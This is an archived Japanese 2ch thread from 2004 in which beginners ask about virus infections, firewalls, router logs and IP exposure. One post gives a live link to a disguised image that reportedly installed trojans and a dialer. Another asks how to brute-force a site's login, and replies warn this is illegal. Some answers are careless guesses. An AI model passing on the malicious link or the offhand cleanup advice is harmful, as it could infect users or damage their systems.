同じ症状になります。ギコナビ使ってるんで
IE起動させなければ何とか2chは閲覧できるんですが
起動させてから、ギコナビで閲覧しようとすると
ノートンが急に反応してギコナビでの接続許可を求めます。
ずっと許可する、としても何度も許可を要求されちっとも
反映されずギコナビでの閲覧もできなくなります。
ネスケに変えようにもIEから接続できないので困っています。
これは何なのでしょうか?
update購読期限が切れたノートンが悪いのでしょうか?
ウィルスでしょうか?ハカーでしょうか?

186 :名無しさん@お腹いっぱい。:04/05/15 23:05
>>184
スパイウェア対応してるの2004からじゃなかったっけ?

187 :名無しさん@お腹いっぱい。:04/05/15 23:11
>>185
ベリサイン証明書の期限切れの問題じゃないの?
http://pc5.2ch.net/test/read.cgi/sec/1073635455/l50

188 :184:04/05/15 23:19
>>186
いや、>>180 に対して>>182のレスつけたんだが
よく見たらウィルスバスター使ってるって書いてあるでしょ。
ウィルスバスターつかってないからよく知らんのだけどファイヤーウォール
ついてるよねぇ。なのになんでつまらんワームにひっかかったのか
疑問におもったわけさ。
やつのひっかかった奴ってシマンテックでいうW32.Randexだよねぇ。

189 :名無しさん@お腹いっぱい。:04/05/15 23:27
>>188
おそらくウイルスバスター98を使っているんだろう・・・w

190 :名無しさん@お腹いっぱい。:04/05/15 23:42
さっきダウンロード版でレスかいたら すこしたってからダウンロード版にでいりできなくなりました 
どうしてですか?どのように対処すればいいんですか?

191 :名無しさん@お腹いっぱい。:04/05/15 23:49
>>190
まあ今日は気分がいいから板違いは許そう。
しかしその"版”ってなんだ”版”て
そんなおまいに>>192がなんかいいたいそうだぞ。

192 :名無しさん@お腹いっぱい。:04/05/15 23:49
>>190
板だよ、板。版なんて厨な字を使うやつは自動あぼーんされる。

193 :名無しさん@お腹いっぱい。:04/05/15 23:50
ワラタ

194 :名無しさん@お腹いっぱい。:04/05/15 23:51
>>190
ただの移転だ。びびってる位ならやめろw
http://www.mfeed.ad.jp/jpnap/traffic.html

195 :185:04/05/15 23:57
多分分かりました。
ノートン2002の例のうpだての奴だと
さっき知りました…Me軽くする為に
システム復元切ってるしやばいなぁ…

おさわがせしました…

196 :名無しさん@お腹いっぱい。:04/05/16 00:01
知人がSasserらしきウィルスにやられました。シマンテックの駆除ツールを使いましたがウィルスが見つかりません
ブラスター、ウェルチの駆除ツールも使いましたが同様です。
OSはXPHOMEでアップデートは一切していません

197 :名無しさん@お腹いっぱい。:04/05/16 00:04
途中で書き込んでしまいますた。lで始まる何かがエラーを起こします。
観戦しているウィルスの候補を教えて下さい。

198 :名無しさん@お腹いっぱい。:04/05/16 00:13
>>197
http://www.symantec.com/region/jp/sarcj/data/index/l.html

199 :名無しさん@お腹いっぱい。:04/05/16 00:14
>>197
オンラインスキャンしてからおいで。
ttp://security.symantec.com/sscv6/home.asp?j=0&langid=jp&venid=sym&close_parent=true&plfid=23&pkj=JSTXWSBZHYZIFKWOZSD
無理ならもっと詳しく症状かいて。
Iで始まる何かじゃわからんよ。

200 :名無しさん@お腹いっぱい。:04/05/16 00:15
>>196
>Sasserらしきウィルス
本当にSasserなのか?いや、ウイルスなのか。
まずはそれを確認。
アンチウイルスソフトやオンラインスキャンかなにかで犯人を確定しろよ。
駆除はその後の話。
>>1-10位を嫁

>OSはXPHOMEでアップデートは一切していません
まずいだろ、それは。
ウイルスさん、いらっしゃい状態か・・・・・
まさかsp1も入っていないのではないだろうな?

201 :名無しさん@お腹いっぱい。:04/05/16 00:33
>>190
マルチ氏ね

202 :名無しさん@お腹いっぱい。:04/05/16 00:33
>>197-200
さんくすです。知人のPCなんで環境が正確に把握できません。
今は明らかに怪しいAvsynmgr.exeを止めてオンラインスキャンにかけている状態です。
ISDNだから時間がかかって仕方ないです

203 :名無しさん@お腹いっぱい。:04/05/16 00:35
今止まりましたorz
LSAshellがエラーを起こします

204 :名無しさん@お腹いっぱい。:04/05/16 00:37
質問させて下さい・・・
先日、掲示板を開いたらウィルスバスターが
TROJ_MUSS.Aと、TROJ_HARNIG.Bと言う物を検出し隔離したので
削除したのですが、その後、
再起動する度にクッキーが消えてしまうようで・・・
一度行ったリンク先も青色に戻ってしまいます。
どうにか治せない物でしょうか・・・
どなたかお願いいたします。

あと、”mstask1.exe”と言うウィンドウが突然出てきたりもしましたが、
どうにか、自力で出ないように治した(つもり)なのですが、ちょっぴり不安だったり。


205 :名無しさん@お腹いっぱい。:04/05/16 00:58
このhousecall.antivirus.comって何?トレンドマイクロのマークは付いているが・・・?
http://www.google.co.jp/search?hl=ja&ie=UTF-8&q=%E3%82%AA%E3%83%B3%E3%83%A9%E3%82%A4%E3%83%B3%E3%82%B9%E3%82%AD%E3%83%A3%E3%83%B3&lr=

206 :名無しさん@お腹いっぱい。:04/05/16 01:00
>>205
トレンドのオンラインスキャン…てかお前、字が読めない人?

207 :名無しさん@お腹いっぱい。:04/05/16 01:04
>>196
sasser【スタコラサッサ】sasser Part2
http://pc5.2ch.net/test/read.cgi/sec/1083839516/451

208 :名無しさん@お腹いっぱい。:04/05/16 01:13
W32.Parite.A.
っていうウイルスに感染しました・・・・・
隔離とかはできないみたいです・・
どうすればいいですか?

209 :名無しさん@お腹いっぱい。:04/05/16 01:32
>>203
sasserスレのぞいて解決しなかったら次の手段ね

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
の値を片っ端からぐぐってごらん。

>>208
W32.Pinfiで検索してごらん。
駆除方法出てくるから。

210 :名無しさん@お腹いっぱい。:04/05/16 01:40
>>206
そんなことは聞いてねーよ、antivirus.comってちゃんとしたトレンドマイクロ
のサイトなのかって話。ふつー↓だろ?
http://www.trendmicro.co.jp/hcall/index.asp

211 :名無しさん@お腹いっぱい。:04/05/16 02:17
Bloodhoundと出る未知なるウィルス

icff7ee6.dll
iel2cde8.dll

が感染していると出ているんだがdll削除しちゃまずいよな
さっぱOSインスコし直しか??

212 :名無しさん@お腹いっぱい。:04/05/16 02:27
>>211
とりあえず削除しちまえ、最悪修復セットアップで何とかなんだろ<無責任w

213 :名無しさん@お腹いっぱい。:04/05/16 03:22
>>210
★サイトの素性の調べ方★
まずDNSをかけてサーバのcanonical name"本名"とIPアドレスを調べる。
dns http://housecall.antivirus.com/housecall/
Canonical name: housecall.trendmicro.com
Addresses: 66.35.253.32 

出てきたIPはAPNICではないから、ARINにWhoisする。ARINは
そのブロックは exodus.net に尋ねろといってくるからそこへWhoisする
 
%rwhois V-1.5:001ab7:00 rwhois.exodus.net (Exodus Communications)
network:Class-Name:network
network:Auth-Area:0.0.0.0/0
network:Network-Name:66.35.255.0
network:IP-Network:66.35.255.0/24
network:Organization;I:Trend Micro, Inc. ←組織
network:Name;I:Tai Li (Terry) Chou ←担当者
network:Email;I:Terry_Chou@trendmicro.com ←メールアドレス
network:Street;I:10101 N. De Anza Blvd. ←住所
network:City;I:Cupertino
network:State;I:CA
network:Postal-Code;I:95014
network:Country-Code;I:USA
これで担当者もメアドもわかったから疑問があればメールなり
郵便なりで質問すればよい。

214 :名無しさん@お腹いっぱい。:04/05/16 03:29
>>211
そういう場合はまず★ぐぐれ★ もしシステムファイルなら大量の
ヒット(少なくても数千件)がある。ウィルスならウィルスとしてヒット
する。まったくヒットしなかったらランダム名のウィルスファイルに
確定。この場合はランダム名だ。さっさと削除しろ。使用中と出たら
セーフモードで(F8連打して)OS起動して削除。



215 :名無しさん@お腹いっぱい。:04/05/16 03:36
>>214
そうか。じゃぁランダムタイプだな
明日にでもバックアップとって削除してみる
d

216 :名無しさん@お腹いっぱい。:04/05/16 05:46
http://www.albinoblacksheep.com/flash/you.html
↑ここでトロイを踏んでしまったようです。
対処はどのようにすればよいのでしょうか?
助けてください。

217 :名無しさん@お腹いっぱい。:04/05/16 05:58
>>216
まず>>1-10を読め

218 :名無しさん@お腹いっぱい。:04/05/16 08:07
>>216
これwめちゃめちゃクラシックなサイトじゃないですかww

219 :名無しさん@お腹いっぱい。:04/05/16 08:25
>>218
いたずらで貼ったようにしかみえないよね。
トロイとか書いてるもん。
JavaScript OFFのおいらには関係ないけど。



220 :名無しさん@お腹いっぱい。:04/05/16 08:32
>>216
> http://www.albinoblacksheep.com/flash/you.html
> ↑ここでトロイを踏んでしまったようです。
> 対処はどのようにすればよいのでしょうか?
> 助けてください。

このサイトは、どうして216のことを知っているのだろうか?

221 :名無しさん@お腹いっぱい。:04/05/16 11:01
>>213
あんたぁ〜、本物だよぉ〜・・・ by 456

222 :ここせ:04/05/16 11:16
トロイの木馬ってウィルスのことだよね?
アフォどもがウィルスじゃないとかいって困る。

223 :名無しさん@お腹いっぱい。:04/05/16 11:48
厳密にいうとウィルスとトロイの木馬は別物だったりする。
ややこしいところだよな。

224 :名無しさん@お腹いっぱい。:04/05/16 11:49
でも一般人にはどうでもいいことだったりする。

225 :名無しさん@お腹いっぱい。:04/05/16 12:09
http://nise428.hp.infoseek.co.jp/cgi-bin/upload/img/1856.jpg
これを踏んでしまって
PCに変なものがインストールされたらしく
かってにモデムでどこかにつなげようとしてきます
幸いADSLなのでモデムはつながらないですんだのですが
コントロールパネルでアンインストールしようとしても
アンインストールの画面を開こうとしてもすぐに閉じられ
何とかCドライブのプログラムファイルで削除することはできたのですが
再起動したらまた同じくなってしまいます
たぶん他にも解決しなけばいけない原因があってそれをまだしていないのだと思うのですが
どうしたら解決できるのでしょうかお願いします

226 :225:04/05/16 13:01
システムファイルで削除をして
何とか再起動時の自動インストールはしなくなったのですが
コントロールパネル内にあるアイコンを使用することができなくなってしまいました
助けてくださいお願いします


227 :名無しさん@お腹いっぱい。:04/05/16 13:07
>>225
VBS_INOR.A
JAVA_BYTEVER.A
JAVA_BYTEVER.A-1

この3種類が仕込んであるからとりあえずウイルスチェックをすること

228 :225:04/05/16 13:20
>>227
ありがとうございます
ウイルス対策のソフトはインストールしていませんでしたので
WEB上でできるところを探してみます

229 :名無しさん@お腹いっぱい。:04/05/16 13:32
>>228
今すぐ電器屋行ってバスター買って来い。バスター買えない貧乏人はネットにつなぐな。

230 :名無しさん@お腹いっぱい。:04/05/16 13:34
バスターマンセーなヤシもつなぐの危険かとw

231 :227:04/05/16 13:35
>>228

ttp://www.trendmicro.com/jp/home/personal.htm

ここからウイルスバスタの30日無料版がDLできるよ

232 :名無しさん@お腹いっぱい。:04/05/16 13:36
JAVA_BYTEVERに罹ってたら笑っちゃうな

233 :225:04/05/16 13:38
一応バスターはあるのですがどうせ大丈夫だろうとか思って
インストールしてませんでした
今オンラインウイルスチェック(無料)
というところでウイルスチェックをしています
途中経過ですがすでに10個以上のファイルに感染しているようです
初期化するしかなさそうでね・・・

234 :227:04/05/16 13:39
>>233

( ゚д゚)ポカーン

235 :名無しさん@お腹いっぱい。:04/05/16 13:46
>>230
現時点で、初心者に勧められるのはバスターだけだというのが、俺の判断なんだが、
藻前は他に勧められるのがあるとでも言うのか?
判断基準:
1 どこの電器屋でも売っている。
2 トラブル少ない。
3 妥当な検出力。

236 :225:04/05/16 13:52
いさぎよく初期化しようと思うのですが
いろいろなアドバイスありがとうございました
これからはウイルスバスターを導入します
あと、JPGだからといってむやみにクリック(特に2ちゃんねるでは)しないように気をつけます
ニュース速報板のホワイトベリー解散というページで感染しました

ウイルス作成する奴って最悪ですね

237 :227:04/05/16 13:56
>>236

2CHからのリンクを開くブラウザはネスケかOPERAに指定しておくこと
そうすると偽装JPGでは開かないよ

238 :名無しさん@お腹いっぱい。:04/05/16 14:07
>>236
つか拡張子がjpgなのにスクリプトとして処理するIEがアフォなだけ
FirefoxとかMozilla系使用してれば何の問題もないぞ

239 :225:04/05/16 14:08
Trojan Horse
Download.Trojan
JS.Downloader.Trojan
MHTMLRedir.Exploit
Backdoor.Jeem
 
ちなみに調べてみたところこれらのウイルスに感染していたようです


240 :名無しさん@お腹いっぱい。:04/05/16 14:13
>>236
怪しいと思ったときは、しばらく待つ。
(他人を人柱にするわけw)
もしくは、
ttp://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi
あたりで確かめる。
もしくは
(半角文字列やラウンジにある)勇気が無くて見られない画像解説スレに依頼。


241 :名無しさん@お腹いっぱい。:04/05/16 14:14
>>239
TU-KA、もう書き込まなくていいから、とっととOS入れ直せよ。
悪意あるスクリプトスレに貼られでもしたら、また泣き見ることになるぞ。

242 :名無しさん@お腹いっぱい。:04/05/16 14:19
いつの間にかtrojan.startpageに感染してしまいました。
このウイルスはネット経由で感染するものでしょうか?
感染源が分からないので教えて下さい。

243 :名無しさん@お腹いっぱい。:04/05/16 14:31
>>242
ネット経由だよ
詳細はこっちを見た方がわかりやすい

エロサイト見たら…助けてください!Part23
http://pc5.2ch.net/test/read.cgi/pcqa/1083768109/
質問するときはテンプレにあるまとめサイトを熟読・実行してからな

244 :名無しさん@お腹いっぱい。:04/05/16 14:33
調べようという気が無いヤシにはなにをすすめても無駄

245 :名無しさん@お腹いっぱい。:04/05/16 14:49
ある日、突然エロサイトのリンク集に飛ばされました。
以来、IEを起動しても不具合報告のダイアログが出てプログラムが終了してしまいます。
エロサイトを見た覚えもないのに…。
これは、やっぱ何かに犯られましたか?)
ノートでネットに繋げません。

教えてくださいな(切実

246 :名無しさん@お腹いっぱい。:04/05/16 14:50


            ノ ‐─┬       /
          ,イ  囗. |      / _ 丿丿
            |    __|    ―ナ′
                     /  ‐' ̄
              ,‐       /
            ナ' ̄       /   、___
     /      ノ`‐、_
    / _ 丿丿  _メ       | _/
  ―ナ′     〈__         X / ̄\
   /  ‐' ̄               / V   /
   /       \   l       レ ' `‐ ノ
  /   、___  Χ ̄ ̄〉
             \ 丿       /
              \          / _
                    ―ナ′__
     | _/       ̄ ̄〉     /   ,
    X / ̄\       ノ     /  _|
   / V   /             /  く_/`ヽ
   レ ' `‐ ノ  ―――'フ
              / ̄      ┼┐┬┐
               |          〈 /  V
              `−      乂   人

            ┼‐      |  ―┼‐
            ┼‐       |    |
            {__)      |   _|
                      |  く_/`ヽ

247 :名無しさん@お腹いっぱい。:04/05/16 14:53
>>245

>>243に同じ

248 :名無しさん@お腹いっぱい。:04/05/16 14:55
>245
リカバリ

249 :名無しさん@お腹いっぱい。:04/05/16 15:07
>>243
ありがとうございました。
問いつめたら、主人がエロサイトを見ていて拾ったみたいです。

250 :名無しさん@お腹いっぱい。:04/05/16 15:16
>>249
パソコン使う前には、必ず抜いてあげるようにしなさい。最強の対策。

251 :名無しさん@お腹いっぱい。:04/05/16 15:20
ルーターを二つ繋げる多段NATの状態でフレッツADSLを使ってます

WAN
 ↑
[ルーター(2)]
192.168.1.1
 ↑
192.168.1.2
[ルーター(1)]
192.168.0.1
 ↑
192.168.0.2
[PC]

(2)がNVというモデムルーターなのですが
2004/05/16 10:43:35 ATTACK Rejected IPSpoofing, WANtoLAN, TCP , 192.168. 1. 2:16464 > XXX.XXX.XXX. XX:32858 (IP-PORT=7)
初めてこんなログを見ました。
XXX.XXX.XXX. XXは、プロバイダから自動で割り当てられるグローバルIPアドレスです
前後はワームに感染してるぽいPCからのログで埋めつくされてるので
ピンポイントに狙われた気がするんですが、
192.168.1.2のIPアドレスの存在が何故バレてるんでしょうか
ripというのは流してないし、icmpはLAN側でしか使わない設定にしてます
なんでルーター(1)のIPアドレスがバレてるのか知りたいです
よろしくお願いします

252 :名無しさん@お腹いっぱい。:04/05/16 15:25
>>251
通信の方向見ろよ、LANからWANへの通信じゃねーか。つまりルータ(1)から
ルーター(2)を経由してインターネットへの通信が遮断されたってログ。

253 :名無しさん@お腹いっぱい。:04/05/16 15:26
>>242
ネット経由じゃないとすると、たとえば直接FDDで仕込むとか?

>>251
プライベートアドレスでググれ。
話はそれからだ。

254 :251:04/05/16 15:46
>>252-253
貼り付けたら、空白が消えちゃったんでわかりにくくなってすいません

2004/05/16 10:43:35 ATTACK Rejected IPSpoofing, WANtoLAN, TCP , 192.168. 1. 2:16464 > XXX.XXX.XXX. XXX:32858 (IP-PORT=7)

実際はこんな感じのログです
通常のOUT方向の192.168.1.2>YYY.YYY.YYY.YYY
との区別はできてるつもりです
滅多にないですが、OUT方向で障害があると
ルーター(1)のほうにもログが残るのですぐにわかります

WANtoLANとあるように、明らかなIP Spoofingです
問題は192.168.1.2というIPアドレスをピンポイントで偽装されたということは
こちらのネットワークに192.168.1.2というIPアドレスがあることがバレてることなんです
経路情報を流してないはずなのに、なぜバレてるか知りたいです
よろしくお願いします

255 :名無しさん@お腹いっぱい。:04/05/16 16:00
ルータの設定がWAN側から出来るようになってるとかは?
パスワードを簡単なものにしていない?adminとか11111とか
qwertyなどとか乱数を使って作ったものでないとやばいぜ。

あと、ゲートウエイとPCにあてるアドレス安易杉

256 :名無しさん@お腹いっぱい。:04/05/16 16:17
Windows XP標準のファイアウォールって単なるパケットフィルタリングなんですか?

257 :名無しさん@お腹いっぱい。:04/05/16 16:27
セキリティ初心者です。質問させていただきます。

初心者板のふしあなさんテストスレでフシアナさんやったら
他板で細かいIPアドレスなどの詳細を晒されました。
そういうのは他人にしられると、今後どういったことがおこるでしょうか?

258 :名無しさん@お腹いっぱい。:04/05/16 16:36
>>257
テンプレを嫁ボケ

259 :名無しさん@お腹いっぱい。:04/05/16 16:38
>>258
すまん。
ちなみにクラッキングとはなんでしょう?

260 :名無しさん@お腹いっぱい。:04/05/16 16:39
>>258
乗ってないんじゃないか?

261 :名無しさん@お腹いっぱい。:04/05/16 16:40
>>259
言葉でわからないことがあったらまずはググれ。

262 :名無しさん@お腹いっぱい。:04/05/16 16:41
>>261
了解。それでもわからなかったら(専門用語ばっかで)また伺わせていただきます

263 :名無しさん@お腹いっぱい。:04/05/16 16:42
>>259
crack・ing
━━ n., a. 【化】分留; 【コンピュータ】XXXXXXXXXXX 〔話〕 すばらしい, すてきな; 〔話〕 ひどい; 〔話〕 見事な, かっこいい.




264 :名無しさん@お腹いっぱい。:04/05/16 16:59
一通り調べてきました。
なるほど・・・
ってかどうすっかなぁ・・・
ちょっとそっち関係かじった人間なら
IPアドレスとかわかってたら、クラッキングされるもんすかね?

265 :名無しさん@お腹いっぱい。:04/05/16 17:14
>>264
ちみのプロバイダでは固定IPなのかい?

266 :名無しさん@お腹いっぱい。:04/05/16 17:23
>>265
うん〜・・・どうだったでしょう。
オヤジが勝手にしててくれたんで(家族全員で共有のため)
しかも当方そっち疎いから・・・すいません。
固定だと、たしか「インターネット上の全ての機器から
自分の機器を特定して操作できる」でしたよね・・・
つまり固定でない場合は安心ということでしょうか?

267 :名無しさん@お腹いっぱい。:04/05/16 17:29
不正アクセスを受けると具体的にどんなことが起こるのですか?

268 :266:04/05/16 17:31
あぁ、ちなみにうちはtikitikiです・・・ってこんだけじゃ
わかんないか(^^;)



269 :名無しさん@お腹いっぱい。:04/05/16 17:50
>>267
情報盗用、他への不正アクセスの踏み台。他へのワームの拡散
システムの改変、破壊、ウイルス、ワーム、トロイ、スパイウェアの感染。
Dos攻撃、ウイルスメール送信、
>>268
わかんない、誰すか?


270 :266:04/05/16 17:57
>>269
えっと
>>257>>259>>262>>264>>266>>268
です

271 :名無しさん@お腹いっぱい。:04/05/16 18:22
多分、ウィルスのせいだと思うのですが
java sprictが働らかなくなってしまったしまいました。

なんとかjava sprictが動くように復旧したいのですが
どのようにすればいいのかご教授いただけないでしょうか

272 :名無しさん@お腹いっぱい。:04/05/16 18:27
>>271
ウィルスの名前くらいわからないかね?
多分ウィルスのせいってわかったのはスキャンでかかったから?

273 :名無しさん@お腹いっぱい。:04/05/16 18:32
>271
その名前も書かれていないウィルスとやらは駆除してるんだろうな?

答えようと思う側は超能力者じゃないんだからさ
ウィルス名とか、使ってるOSとか
検出に使ったウィルス対策ソフトの名前くらいは書いとけよ。
あと、駆除したかどうかもナ。
それだけの情報では「リカバリしろ」以外の助言は不可能。

274 :名無しさん@お腹いっぱい。:04/05/16 18:41
IPアドレスが知られても自分の個人情報が知られたり
わざわざクラッキングの目標にされることはないっしょ。安心汁
心配するよりファイアウォールやセキュリティパッチを入れておくほうが重要

275 :274:04/05/16 18:42
>>270のレスですた

276 :名無しさん@お腹いっぱい。:04/05/16 18:48
win2000なんですが、ローカルエリアの接続状態をみると
こちらから送信はほとんどしてないのに(ネット閲覧、ダウンロード等)
なぜか送信パケットがやたらあるのが気になりました。
(受信パケット数より多い)
これが普通なんでしょうか。

277 :270:04/05/16 18:51
>>274
なるほど。
しかし、掲示板上でそのIP割れたクラッカーに私怨かったら
目標にされることもかんがえられかねないでしょうか?

278 :270:04/05/16 18:58
ちなみにアドレス以外に晒された詳細はこれらです

IPアドレス ホスト名 IPアドレス
割当国 都道府県 市外局番 接続回線
IPネットワークアドレス ネットワーク名 組織名

279 :名無しさん@お腹いっぱい。:04/05/16 19:03
>>277
おまいはその掲示板でクラッカーとやらに私怨かうような真似でもしたのか?
274で答え出てる。

280 :270:04/05/16 19:05
>>279
討論。トチ狂ったらナニしでかすかわからんですから。
まぁ、現状としては火壁はなんとかしてます。


281 :p42158-adsau12honb6-acca.tokyo.ocn.ne.jp:04/05/16 19:14
>>280
日本 埼玉県 048 ADSL OCN
この情報かから君はなにかできるかな?
そんなに心配すんなよ。
対策だけはしっかりやっとけよ。


282 :名無しさん@お腹いっぱい。:04/05/16 19:15
>278
それ、IPアドレスからわかる情報だけじゃねぇの?
ていうか普通、IPアドレスからはその程度しかわからないと思う。

283 :270:04/05/16 19:18
でしたか。どうもです♪
なんかびびりすぎ(恥

対策はファイヤーウォールとセキリティパッチだけでよろしいんでしょうか?

284 :名無しさん@お腹いっぱい。:04/05/16 19:28
そんなに気になるならネットつなげない方がいいよ。

285 :270:04/05/16 19:32
>>284
うん。びびっててしばらくUSBから抜いてたw


これでネット初めて5年(うち2ch4年)ってんだから
学習能力NASA杉だよなぁ・・・orz

286 :名無しさん@お腹いっぱい。:04/05/16 19:46
>>283
パッチはWindows updateかMicrosoftのHPで、
セキュリティが心配なら他に
アンチウイルスソフト、スパイウェア駆除、防御ソフトは入れてなかったらいれる。
セキュリティ板みればフリーで全て揃うよ。


287 :名無しさん@お腹いっぱい。:04/05/16 19:55
すみません質問です。
コンピュータウイルスのせいかわかりませんが、
インターネットにつなげると毎回20分くらいで切断されてしまうのですが、
解決方法はあるのでしょうか?

今は友人の家のパソコンで書き込んでいます。

288 :名無しさん@お腹いっぱい。:04/05/16 20:00
>>287
それだけの情報で答えようがありません。

289 :名無しさん@お腹いっぱい。:04/05/16 20:02
>>287
友達の家でウィルス対策ソフトの体験版と最新定義をダウンロード
してCDに焼いてからインストールしてみましょう。


290 :287:04/05/16 20:05
>>288
すみません。あまりパソコンに詳しくないもので…
ADSL接続です。

291 :名無しさん@お腹いっぱい。:04/05/16 20:08
パソコン詳しくないのに、なんで2ちゃんに来てんだろう?
(って関係ないけど・・w)

安直に人に頼るのもどうかと。

そのお友達にやってもらえば?


292 :287:04/05/16 20:09
>>288
正確に言うと、接続はしているのですが、サイトをみることができないみたいです。




293 :名無しさん@お腹いっぱい。:04/05/16 20:12
>>290
ウィルススキャンぐらいしてから聞け。
してたら駆除できたか、ウィルス名、ウィルスソフト、OSくらい書け。

294 :287:04/05/16 20:13
>>291

友達に2ちゃんで聞いたら、て言われて…。
そうですか…。2ちゃんねるって書き込むとそういう風に言われるんですね…。

295 :287:04/05/16 20:15
>>293
わかりましたスキャンしてみます。
もうしわけありません。

じゃあ退出します。

296 :名無しさん@お腹いっぱい。:04/05/16 20:17
>>294

>>1読んでから質問するというルールを守らないから、
ちなみにどこで聞くのにも293の回答は常識だぞ、289の回答で調べたのか?

297 :ここせ:04/05/16 20:32
>>223
ウイルスは広義。
よってトロイの木馬も入る。

お前、バカですか?

トロイの木馬はウィルスです。

298 :名無しさん@お腹いっぱい。:04/05/16 20:44
>>297狭義でもウイルスで分類してるよ(シマンテクとか)
「ファイルやブートセクタなどに感染(寄生)して増殖して拡がるプログラム、実行コード。」
他のプログラムに依存して増殖するとか。またトロイの木馬型ウイルスって言う場合もある。
ソフト会社や団体で違うので一概にはいえないだろ?


299 :名無しさん@お腹いっぱい。:04/05/16 20:46
>>297
増殖すればウィルス、昔からの掟
しかし、それでは対策ソフトをみなさん買ってくれないので、結構幅を広げている。

300 :名無しさん@お腹いっぱい。:04/05/16 20:47
>>297


301 :名無しさん@お腹いっぱい。:04/05/16 20:51
>287
たぶん、ウィルスのせいじゃなくて、最初の設定が問題なんじゃないかな。
同じページをずっと見てて切れるのだったら、以下を試してみて。

ツール→インターネットオプション→接続→今使ってる
接続を選ぶ→設定ボタンを押す→ダイヤルアップの設定欄にある
詳細設定を押す→「アイドリング時間が次の時間になったら切断する」の
チェックボックスを見てみる。そこにチェックが入ってたらオフにする。
↑デフォルトでは、これが20分で切断になってるはず。

302 :名無しさん@お腹いっぱい。:04/05/16 21:33
ぞね使っているんですが、XPのFWきった方がいいですか?

303 :名無しさん@お腹いっぱい。:04/05/16 21:36
>>297


304 :名無しさん@お腹いっぱい。:04/05/16 21:43
222 名前:ここせ [] 投稿日:04/05/16 11:16
トロイの木馬ってウィルスのことだよね?
アフォどもがウィルスじゃないとかいって困る。


223 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:04/05/16 11:48
厳密にいうとウィルスとトロイの木馬は別物だったりする。
ややこしいところだよな。


297 名前:ここせ [] 投稿日:04/05/16 20:32
>>223
ウイルスは広義。
よってトロイの木馬も入る。

お前、バカですか?

トロイの木馬はウィルスです。



305 :名無しさん@お腹いっぱい。:04/05/16 21:47
Zipのパスワード検索するのってありますよね
あれと似た感じで↓みたいな入り口のパスワード検索できませんか?
http://pc.afterfive.tv/index1.html?media=ayg
すでに既出ならどこにあるか案内欲しいですが・・・


306 :名無しさん@お腹いっぱい。:04/05/16 21:53
>>305
おまいはアホですか。
自分のやろうとしてることを少しは考えろ。

307 :名無しさん@お腹いっぱい。:04/05/16 21:53
>>305
それを実行する事が犯罪だと知っていますか?
知っているhttp://human4.2ch.net/4649/
知らなかったなら去りなさい。

308 :305:04/05/16 21:58
自分で作った登録に指定された方法以外で入るのが犯罪でしょうか・・・
しかしやめときます。

309 :名無しさん@お腹いっぱい。:04/05/16 21:59
無知って怖いな。

310 :名無しさん@お腹いっぱい。:04/05/16 22:02
>>308
何回もアクセスすればログが残る。もし管理者が不審に思い、不正アクセスで被害届出したときに
お前はそのアカウントの正当な所有者だと証明できないだろう。
やめとけ。

311 :名無しさん@お腹いっぱい。:04/05/16 22:07
>>308
>自分で作った登録に指定された方法以外で入るのが犯罪でしょうか・・・
意味わからん。

312 :名無しさん@お腹いっぱい。:04/05/16 22:07
223は可哀想。バカに馬鹿呼ばわりされて

313 :名無しさん@お腹いっぱい。:04/05/16 22:11
>>222のような馬鹿は始めから放置すればよろしい。

314 :ここせ:04/05/16 22:25
トロイの木馬はどう考えたってウィルスだろうが!!

315 :名無しさん@お腹いっぱい。:04/05/16 22:28
222 名前:ここせ [] 投稿日:04/05/16 11:16
トロイの木馬ってウィルスのことだよね?
アフォどもがウィルスじゃないとかいって困る。


223 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:04/05/16 11:48
厳密にいうとウィルスとトロイの木馬は別物だったりする。
ややこしいところだよな。


297 名前:ここせ [] 投稿日:04/05/16 20:32
>>223
ウイルスは広義。
よってトロイの木馬も入る。

お前、バカですか?

トロイの木馬はウィルスです。


314 名前:ここせ 投稿日:04/05/16 22:25
トロイの木馬はどう考えたってウィルスだろうが!!


316 :名無しさん@お腹いっぱい。:04/05/16 22:28
>>314
ハイハイ、その通り。判ったからどっか行きなさい。

317 :名無しさん@お腹いっぱい。:04/05/16 22:28
305 名前:名無しさん@お腹いっぱい。 投稿日:04/05/16 21:47
Zipのパスワード検索するのってありますよね
あれと似た感じで↓みたいな入り口のパスワード検索できませんか?
http://pc.afterfive.tv/index1.html?media=ayg
すでに既出ならどこにあるか案内欲しいですが・・・


308 名前:305 投稿日:04/05/16 21:58
自分で作った登録に指定された方法以外で入るのが犯罪でしょうか・・・
しかしやめときます。


318 :名無しさん@お腹いっぱい。:04/05/16 22:32
>>266,277
なんとなく「住所を知られたら、空き巣や放火の被害に遭う」という主張みたいだ。
>>271
script(スクリプト)な。
「スプリクト」でググると結構出てくる…。
>>290
なぜパソコンに詳しくないのに、それだけの情報でウイルスだって判ったんだ?
>>308
そんなに疑問だったら、やればいい。
但し、自分の経歴に前科が付くのは授業料として高いと思う。

319 :名無しさん@お腹いっぱい。:04/05/16 22:48
analogというログ解析ツールは何処で手に入るのでしょうか?
教えてください。
よろしくお願いします。

320 :名無しさん@お腹いっぱい。:04/05/16 22:51
>>306-313>>317>>318
>>305がただの宣伝だってことが見抜けない君たちって・・・、セキュリティーっ
てウイルスやスパイウェアだけじゃないんだよw


321 :名無しさん@お腹いっぱい。:04/05/16 23:03
とにかく何でもいいからアドレスとっとけ、と思ってとったhotmailのアドレス。
しかし登録したその日に突然全然知らない人からメール。
題名文字化け、名前も知らんしもちろんそのまま削除。
が、しかし数時間後次はメッセで知らない人が勝手に私のアドレスを登録。もちろん登録禁止。
すると次はアドレスの違う誰かがメッセ登録。禁止にしましたが…。
………これって、やっぱりアドレス変えたほうがいいですか。
英単語って狙われやすいのでしょうか……。

322 :名無しさん@お腹いっぱい。:04/05/16 23:05
>>320
リンク先みないで適当なレスつけてお引取り願うのが初心者スレでは正しいのだよ。
君、ここせ君でしょ。

323 :名無しさん@お腹いっぱい。:04/05/16 23:07
>>321
あったりまえ。

324 :名無しさん@お腹いっぱい。:04/05/16 23:11
>>321
以前つかわれてて、無効になってたアドレスと
自分のアドレスがたまたまおなじだったのかもよ。

325 :名無しさん@お腹いっぱい。:04/05/16 23:12
>>323
>>321のどこについて当たり前と言ってるんだ?

326 :名無しさん@お腹いっぱい。:04/05/16 23:13
>>319
ググレ

327 :名無しさん@お腹いっぱい。:04/05/16 23:13
>>321
別に狙われてるわけじゃないから安心しる。

